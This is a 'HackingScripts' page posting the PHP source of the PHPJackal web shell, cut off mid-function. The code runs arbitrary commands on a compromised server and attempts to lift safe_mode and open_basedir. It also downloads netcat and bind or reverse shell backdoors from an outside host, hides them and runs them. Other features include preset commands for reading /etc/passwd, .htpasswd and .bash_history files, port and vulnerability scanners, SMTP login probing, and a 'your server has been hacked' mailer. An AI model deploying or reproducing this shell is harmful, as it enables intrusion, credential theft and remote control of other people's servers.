HackingScripts

Hack Scripts for everybody

PHPJackal Shell

19 Feb 2014

PHPJackal v$v – Powered By NetJackal

PHPJackal Shell Source Code

   1 <?php
   2 #--Config--#
   3 $login_password= ''; //Set password
   4 #----------#
   5 error_reporting(E_ALL);
   6 set_time_limit(0);
   7 ini_set("max_execution_time","0");
   8 ini_set("memory_limit","9999M");
   9 set_magic_quotes_runtime(0);
  10 if(!isset($_SERVER))$_SERVER = &$HTTP_SERVER_VARS;
  11 if(!isset($_POST))$_POST = &$HTTP_POST_VARS;
  12 if(!isset($_GET))$_GET = &$HTTP_GET_VARS;
  13 if(!isset($_COOKIE))$_COOKIE=$HTTP_COOKIE_VARS;
  14 $_REQUEST = array_merge($_GET, $_POST);
  15 if (get_magic_quotes_gpc()){
  16 foreach ($_REQUEST as $key=>$value)
  17 {
  18 $_REQUEST[$key]=stripslashes($value);
  19 }
  20 }
  21 function hlinK($str=""){
  22 $myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL');
  23 $ret=$_SERVER['PHP_SELF']."?";
  24 $new=explode("&",$str);
  25 foreach ($_GET as $key => $v){
  26 $add=1;
  27 foreach($new as $m){
  28 $el = explode("=", $m);
  29 if ($el[0]==$key)$add=0;
  30 }
  31 if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
  32 }
  33 $ret.=$str;
  34 return $ret;
  35 }
  36 if(!empty($login_password)){
  37 if(!empty($_REQUEST['fpassw'])){
  38 if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw']));
  39 @header("Location: ".hlinK());
  40 }
  41 if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></td></tr></form></table></body></html>");
  42 }
  43 if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']);
  44 function checkthisporT($ip,$port,$timeout,$type=0){
  45 if(!$type){
  46 $scan=@fsockopen($ip,$port,$n,$s,$timeout);
  47 if($scan){fclose($scan);return 1;}
  48 }
  49 elseif(function_exists('socket_set_timeout')){
  50 $scan=@fsockopen("udp://".$ip,$port);
  51 if($scan){
  52 socket_set_timeout($scan,$timeout);
  53 @fwrite($scan,"\x00");
  54 $s=time();
  55 fread($scan,1);
  56 if((time()-$s)>=$timeout){fclose($scan);return 1;}
  57 }
  58 }
  59 return 0;
  60 }
  61 if (!function_exists("file_get_contents")){
  62 function file_get_contents($addr){
  63 $a = fopen($addr,"r");
  64 $tmp = fread($a,filesize($a));
  65 fclose($a);
  66 if($a)return $tmp;
  67 }
  68 }
  69 if (!function_exists("file_put_contents")){
  70 function file_put_contents($addr,$con){
  71 $a = fopen($addr,"w");
  72 if(!$a)return 0;
  73 fwrite($a,$con);
  74 fclose($a);
  75 return strlen($con);
  76 }
  77 }
  78 function flusheR(){
  79 flush();@ob_flush();
  80 }
  81 if (!empty($_REQUEST['downloaD'])){
  82 @ob_clean();
  83 $dl=$_REQUEST['downloaD'];
  84 $con=file_get_contents($dl);
  85 header("Content-type: application/octet-stream");
  86 header("Content-disposition: attachment; filename=\"$dl\";");
  87 header("Content-length: ".strlen($con));
  88 echo $con;
  89 exit;
  90 }
  91 if (!empty($_REQUEST['imagE'])){
  92 $img=$_REQUEST['imagE'];
  93 header("Content-type: imagE/gif");
  94 header("Content-length: ".filesize($img));
  95 header("Last-Modified: ".date("r",filemtime($img)));
  96 echo file_get_contents($img);
  97 exit;
  98 }
  99 @header("Cache-Control: no-cache, must-revalidate");
 100 @header("Expires: Mon, 7 Aug 1987 05:00:00 GMT");
 101 function showsizE($size){
 102 if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
 103 elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
 104 elseif ($size>=1024)$size = round(($size/1024),2)." KB";
 105 else $size .= " B";
 106 return $size;
 107 }
 108 if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;
 109 $errorbox = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td><b>Error: </b>";
 110 $et = "</td></tr></table>";
 111 $v="1.5";
 112 $msgbox="<br><table border=0 cellpadding=0 cellspacing=0
 113  style=\"border-collapse: collapse\" bordercolor=\"#282828\"
 114  bgcolor=\"#333333\" width=\"100%\"><tr><td align=\"center\">";
 115 $intro="<center><table border=0 style=\"border-collapse: collapse\"
 116  bordercolor=\"#282828\"><tr><td bgcolor=\"#330000\"><b>Script:</b><br>"
 117  .str_repeat("-=-",25)."<br><b>Name:</b> Egyptian Hacker<br><b>Version:</b>
 118   $v<br><br><b>Author:</b>
 119   <br>".str_repeat("-=-",25)."<br>
 120   <b>Name:</b> Elswify Scripts<br><b>Country:</b>
 121   Egypt<br><b>Email:</b> <a href=\"mailto:elswifymoka122@yahoo.com?subject=PHPJackal\">elswifymoka122@yahoo.com</a><br></font>$et</center>";
 122 $footer="${msgbox}PHPJackal v$v - Powered By <a href=\"http://netjackal.by.ru\" target=\"_blank\">NetJackal</a>$et";
 123 $hcwd="<input type=hidden name=workingdiR value=\"".getcwd()."\">";
 124 $t = "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">";
 125 $crack="</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
 126 function namE(){
 127 $name='';
 128 srand((double)microtime()*100000);
 129 for ($i=0;$i<=rand(3,10);$i++){
 130 $name.=chr(rand(97,122));
 131 }
 132 return $name;
 133 }
 134 function whereistmP(){
 135 $uploadtmp=ini_get('upload_tmp_dir');
 136 $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
 137 if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
 138 if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
 139 if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
 140 if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
 141 if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
 142 return ".";
 143 }
 144 function shelL($command){
 145 global $windows,$disablefunctions;
 146 $exec = '';$output= '';
 147 $dep[]=array('pipe','r');$dep[]=array('pipe','w');
 148 if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
 149 elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
 150 elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
 151 elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
 152 elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
 153 elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
 154 elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
 155 return $exec;
 156 }
 157 function downloadiT($get,$put){
 158 $fo=@strtolower(ini_get('allow_url_fopen'));
 159 if($fo || $fo=='on')$con=file_get_contents($get);
 160 else{
 161 $u=parse_url($get);
 162 $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
 163 $url=fsockopen($host, 80, $en, $es, 12);
 164 fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
 165 $tmp=$con='';
 166 while($tmp!="\r\n")$tmp=fgets($url);
 167 while(!feof($url))$con.=fgets($url);
 168 }
 169 $mk=file_put_contents($put,$con);
 170 if($mk)return 1;
 171 return 0;
 172 }
 173 function smtplogiN($addr,$user,$pass,$timeout){
 174 $sock=fsockopen($addr,25,$n,$s,$timeout);
 175 if(!$sock)return -1;
 176 fread($sock,1024);
 177 fputs($sock,'ehlo '.namE()."\r\n");
 178 $res=substr(fgets($sock,512),0,1);
 179 if($res!='2')return 0;
 180 fgets($sock,512);fgets($sock,512);fgets($sock,512);
 181 fputs($sock,"AUTH LOGIN\r\n");
 182 $res=substr(fgets($sock,512),0,3);
 183 if($res!='334')return 0;
 184 fputs($sock,base64_encode($user)."\r\n");
 185 $res=substr(fgets($sock,512),0,3);
 186 if($res!='334')return 0;
 187 fputs($sock,base64_encode($pass)."\r\n");
 188 $res=substr(fgets($sock,512),0,3);
 189 if($res!='235')return 0;
 190 return 1;
 191 }
 192 function checksmtP($host,$timeout){
 193 $from=strtolower(namE())."@".strtolower(namE()).".com";
 194 $sock=@fsockopen($host,25,$n,$s,$timeout);
 195 if(!$sock)return -1;
 196 $res=substr(fgets($sock,512),0,3);
 197 if($res!='220')return 0;
 198 fputs($sock,'HELO '.namE()."\r\n");
 199 $res=substr(fgets($sock,512),0,3);
 200 if($res!='250')return 0;
 201 fputs($sock,"MAIL FROM: <$from>\r\n");
 202 $res=substr(fgets($sock,512),0,3);
 203 if($res!='250')return 0;
 204 fputs($sock,"RCPT TO: <contact@persianblog.com>\r\n");
 205 $res=substr(fgets($sock,512),0,3);
 206 if($res!='250')return 0;
 207 fputs($sock,"DATA\r\n");
 208 $res=substr(fgets($sock,512),0,3);
 209 if($res!='354')return 0;
 210 fputs($sock,"From: ".namE()." ".namE()." <$from>\r\nSubject: ".namE()."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".namE().namE().namE()."\r\n.\r\n");
 211 $res=substr(fgets($sock,512),0,3);
 212 if($res!='250')return 0;
 213 return 1;
 214 }
 215 function check_urL($url,$method,$search,$timeout){
 216 if(empty($search))$search='200';
 217 $u=parse_url($url);
 218 $method=strtoupper($method);
 219 $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
 220 $data=(!empty($u['query']))?$u['query']:'';
 221 if(!empty($data))$data="?$data";
 222 $sock=@fsockopen($host,80,$en,$es,$timeout);
 223 if($sock){
 224 fputs($sock,"$method $file$data HTTP/1.0\r\n");
 225 fputs($sock,"Host: $host\r\n");
 226 if($method=='GET')fputs($sock,"\r\n");
 227 elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
 228 else return 0;
 229 if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;}
 230 while(!feof($sock)){
 231 $res=trim(fgets($sock));
 232 if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
 233 }
 234 fclose($sock);
 235 }
 236 return 0;
 237 }
 238 function get_sw_namE($host,$timeout){
 239 $sock=@fsockopen($host,80,$en,$es,$timeout);
 240 if($sock){
 241 $page=namE().namE();
 242 fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
 243 while(!feof($sock)){
 244 $con=fgets($sock);
 245 if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
 246 }
 247 fclose($sock);
 248 return -1;
 249 }return 0;
 250 }
 251 function snmpchecK($ip,$com,$timeout){
 252 $res=0;
 253 $n=chr(0x00);
 254 $packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). 
 255 $com. chr(0xA0). 
 256 chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n.
 257 chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C).
 258 chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01).
 259 chr(0x01). chr(0x01). $n. chr(0x05). $n;
 260 $sock=@fsockopen("udp://$ip",161);
 261 socket_set_timeout($sock,$timeout);
 262 @fputs($sock,$packet);
 263 socket_set_timeout($sock,$timeout);
 264 $res=fgets($sock);
 265 fclose($sock);
 266 return $res;
 267 }
 268 
 269 $safemode=(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on')?'ON':'OFF';
 270 if($safemode=="ON"){@ini_restore("safe_mode");@ini_restore("open_basedir");}
 271 $disablefunctions = @ini_get('disable_functions');
 272 if (!function_exists("str_repeat")){
 273 function str_repeat($str,$c){
 274 $r="";
 275 for($i=0; $i < $cu; $i++)$r.=$str;
 276 return $r;
 277 }
 278 }
 279 
 280 function brshelL(){
 281 global $errorbox, $windows,$et,$hcwd;
 282 $_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;
 283 $addr='http://netjackal.by.ru/backdoor';
 284 $error="$errorbox Can not make backdoor file, go to writeable folder.$et";
 285 $n=namE();
 286 if(!$windows)$n=".$n";
 287 $d=whereistmP();
 288 $name=$d.DIRECTORY_SEPARATOR.$n;
 289 $perl=(!$windows && shelL('which perl'))?$perl=shelL('which perl'):'perl';
 290 $c=($_REQUEST['C'])?1:0;
 291 if (!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1) ){
 292 $port=(int)$_REQUEST['port'];
 293 if($windows){
 294 if($c){
 295 $name.=".exe";
 296 $bd=downloadiT("$addr/nc.exe",$name);
 297 shelL("attrib +H $name");
 298 if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");
 299 }else{
 300 $name = $name.".pl";
 301 $bd=downloadiT("$addr/winbind.pl",$name);
 302 shelL("attrib +H $name");
 303 if(!$bd)echo $error;else shelL("perl.exe $name $port");
 304 }
 305 }
 306 else{
 307 if($c){
 308 $bd=downloadiT("$addr/bind.c",$name);
 309 if (!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");
 310 }else{
 311 $bd=downloadiT("$addr/bind.pl",$name);
 312 if (!$bd)echo $error; else shelL("cd $d;$perl $n $port &");
 313 echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>";
 314 }
 315 }
 316 }
 317 elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){
 318 $ip=$_REQUEST['ip'];
 319 $port=(int)$_REQUEST['rport'];
 320 if($windows){
 321 if($c){
 322 $name.='.exe';
 323 $bd=downloadiT("$addr/nc.exe",$name);
 324 shelL("attrib +H $name");
 325 if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");
 326 }else{
 327 $name = $name.".pl";
 328 $bd=downloadiT("$addr/winrc.pl",$name);
 329 shelL("attrib +H $name");
 330 if (!$bd)echo $error; else shelL("perl.exe $name $ip $port");
 331 }
 332 }
 333 else{
 334 if($c){
 335 $bd=downloadiT("$addr/rc.c",$name);
 336 if(!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
 337 }else{
 338 $bd=downloadiT("$addr/rc.pl",$name);
 339 if(!$bd)echo $error;else shelL("cd $d;$perl $n $ip $port &");
 340 }
 341 }
 342 echo "<font color=blue>Done!</font>";}
 343 else{echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"50%\" bgcolor=\"#333333\">Bind shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=port value=55501 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input type=submit class=buttons value=Bind></td></tr></form></table></td><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"40%\" bgcolor=\"#333333\">Reverse shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#808080\">IP:</td><td bgcolor=\"#808080\"><input type=text name=ip value=";echo $_SERVER["REMOTE_ADDR"]; echo " size=17></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=rport value=53 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Connect></td></tr></form></table>$et";}}
 344 function showimagE($img){
 345 echo "<center><img border=0 src=\"".hlinK("imagE=$img&&workingdiR=".getcwd())."\"></center>";}
 346 function editoR($file){
 347 global $errorbox,$et,$hcwd;
 348 if (is_file($file)){
 349 if (!is_readable($file)){echo "$errorbox File is not readable$et<br>";}
 350 if (!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";}
 351 $data = file_get_contents($file);
 352 echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\">$hcwd<input type=text value=\"".htmlspecialchars($file)."\" size=75 name=file><input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"64\">";
 353 echo htmlspecialchars($data);
 354 echo "</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"$file\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">";
 355 }
 356 else {echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\"><input type=text value=\"".getcwd()."\" size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"63\"></textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"".getcwd()."\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">";
 357 }
 358 echo "$hcwd<input type=submit class=buttons name=Save value=Save></td></form></tr></table></center>";
 359 }
 360 function webshelL(){
 361 global $windows,$hcwd;
 362 if($windows){
 363 $alias="<option value=\"netstat -an\">Display open ports</option><option value=\"tasklist\">List of processes</option><option value=\"systeminfo\">System information</option><option value=\"ipconfig /all\">IP configuration</option><option value=\"getmac\">Get MAC address</option><option value=\"net start\">Services list</option><option value=\"net view\">Machines in domain</option><option value=\"net user\">Users list</option><option value=\"gpresult\">Group policy</option><option value=\"shutdown -s -f -t 1\">Turn off the server</option>";
 364 }
 365 else{
 366 $alias="<option value=\"netstat -an | grep -i listen\">Display open ports</option><option value=\"last -a -n 250 -i\">Show last 250 logged in users</option><option value=\"which wget curl lynx w3m\">Downloaders</option><option value=\"find / -perm -2 -type d -print\">Find world-writable directories</option><option value=\"find . -perm -2 -type d -print\">Find world-writable directories(in current directory)</option><option value=\"find / -perm -2 -type f -print\">Find world-writable files</option><option value=\"find . -perm -2 -type f -print\">Find world-writable files(in current directory)</option><option value=\"find / -type f -perm 04000 -ls\">Find files with SUID bit set</option><option value=\"find / -type f -perm 02000 -ls\">Find files with SGID bit set</option><option value=\"find / -name .htpasswd -type f\">Find .htpasswd files</option><option value=\"find / -type f -name .bash_history\">Find .bash_history files</option><option value=\"cat /etc/syslog.conf\">View syslog.conf</option><option value=\"cat cat /etc/hosts\">View hosts</option><option value=\"ps auxw\">List of processes</option>";
 367 if(is_dir('/etc/valiases'))$alias.="<option value=\"ls -l /etc/valiases\">List of Cpanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value=\"ls -l /etc/vdomainaliases\">List Cpanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value=\"cat /var/cpanel/accounting.log\">Display Cpanel`s log</option>";
 368 if(is_dir('/var/spool/mail/'))$alias.="<option value=\"ls /var/spool/mail/\">Mailboxes list</option>";
 369 }
 370 echo "<center><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=82 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><tr><td><b>Web Shell:</b></td></tr><td bgcolor=\"#666666\"><textarea rows=\"22\" cols=\"78\">";
 371 if (!empty($_REQUEST['cmd'])) echo shelL($_REQUEST['cmd']);
 372 echo"</textarea></td></tr><form method=post><tr><td bgcolor=\"#808080\"><input type=text size=91 name=cmd value=\"";if (!empty($_REQUEST['cmd'])) echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows) echo "cat /etc/passwd";echo "\">$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor=\"#808080\"><select name=\"cmd\" width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></table><center>";
 373 }
 374 function maileR(){
 375 global $msgbox,$et,$hcwd;
 376 $cwd= getcwd();
 377 if (!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){
 378 $to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];
 379 if (!mail($to,$subject,$body,"From: $from"))break;
 380 echo "$msgbox<b>Mail sent!</b><br>$et";
 381 }
 382 echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td><b>Mailer:</b></td></tr><td width=\"20%\" bgcolor=\"#666666\">SMTP</td><td bgcolor=\"#666666\">".ini_get('SMTP')." (".ini_get('smtp_port').")</td></tr><tr><td bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\"><input name=from type=text value=\"evil@hell.gov\" size=55>$hcwd</td><tr><td width=\"25%\" bgcolor=\"#666666\">To:</td><td bgcolor=\"#666666\"><input name=to type=text value=\""; if (!empty($_REQUEST['to'])) echo htmlspecialchars($_REQUEST['to']); elseif(!empty($_ENV["SERVER_ADMIN"])) echo $_ENV["SERVER_ADMIN"];else echo "admin@".getenv('HTTP_HOST'); echo "\" size=55></td></tr><tr><td bgcolor=\"#808080\">Subject:</td><td bgcolor=\"#808080\"><input name=subject type=text value=\"YOUR SERVER HAS BEED HACKED :-P\" size=55></td><tr><td bgcolor=\"#666666\">Body:</td><td bgcolor=\"#666666\"><textarea rows=\"18\" cols=\"43\" name=body>Admin, your system has been hacked! if you don`t seCure it, next time i`ll format your box.</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=\"right\"><input type=submit class=buttons value=Send></form>$et";
 383 }
 384 function scanneR(){
 385 global $hcwd;
 386 if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1";
 387 $udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
 388 if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
 389 $target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0;
 390 echo "<font color=blue>Port scanning started against ".htmlspecialchars($target).":<br>";
 391 $start=time();
 392 for($i=$from;$i<=$to;$i++){
 393 if($tcp){
 394 if (checkthisporT($target,$i,$timeout)){
 395 $nu++;
 396 $ser="";
 397 if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")";
 398 echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>";
 399 }
 400 }
 401 if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";}
 402 flusheR();
 403 }
 404 $time=time()-$start;
 405 echo "Done! ($time seconds)</font>";
 406 }
 407 elseif (!empty($_REQUEST['securityscanner'])){
 408 echo "<font color=blue>";
 409 $start=time();
 410 $from=$_REQUEST['from'];
 411 $to=(int)$_REQUEST['to'];
 412 $timeout=(int)$_REQUEST['timeout'];
 413 $f = substr($from,strrpos($from,".")+1);
 414 $from = substr($from,0,strrpos($from,"."));
 415 if(!empty($_REQUEST['httpscanner'])){
 416 echo "Loading webserver bug list...";
 417 flusheR();
 418 $buglist=whereistmP().DIRECTORY_SEPARATOR.namE();
 419 $dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
 420 if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>";
 421 flusheR();
 422 }else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";}
 423 for($i=$f;$i<=$to;$i++){
 424 $output=0;
 425 $ip="$from.$i";
 426 if(!empty($_REQUEST['nslookup'])){
 427 $hn=gethostbyaddr($ip);
 428 if($hn!=$ip)echo "$ip [$hn]<br>";}
 429 flusheR();
 430 if(!empty($_REQUEST['ipscanner'])){
 431 $port=$_REQUEST['port'];
 432 if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port;
 433 $open=$ser="";
 434 foreach($p as $po){
 435 $scan=checkthisporT($ip,$po,$timeout);
 436 if ($scan){
 437 $ser="";
 438 if($ser=getservbyport($po,"tcp"))$ser="($ser)";
 439 $open.=" $po$ser ";
 440 }
 441 }
 442 if($open){echo "$ip) Open ports:$open<br>";$output=1;}
 443 flusheR();
 444 }
 445 if(!empty($_REQUEST['httpbanner'])){
 446 $res=get_sw_namE($ip,$timeout);
 447 if($res){
 448 echo "$ip) Webserver software: ";
 449 if($res==-1)echo "Unknow";
 450 else echo $res;
 451 echo "<br>";
 452 $output=1;
 453 }
 454 flusheR();
 455 }
 456 if(!empty($_REQUEST['httpscanner'])){
 457 if(checkthisporT($ip,80,$timeout) && !empty($file)){
 458 $admin=array('/admin/','/adm/');
 459 $users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
 460 $nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
 461 $cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
 462 foreach ($file as $v){
 463 $vuln=array();
 464 $v=trim($v);
 465 if(!$v || $v{0}=='#')continue;
 466 $v=str_replace('","','^',$v);
 467 $v=str_replace('"','',$v);
 468 $vuln=explode('^',$v);
 469 $page=$cqich=$nukech=$adminch=$userch=$vuln[1];
 470 if(strstr($page,'@CGIDIRS'))
 471 foreach($cgi as $cg){
 472 $cqich=str_replace('@CGIDIRS',$cg,$page);
 473 $url="http://$ip$cqich";
 474 $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
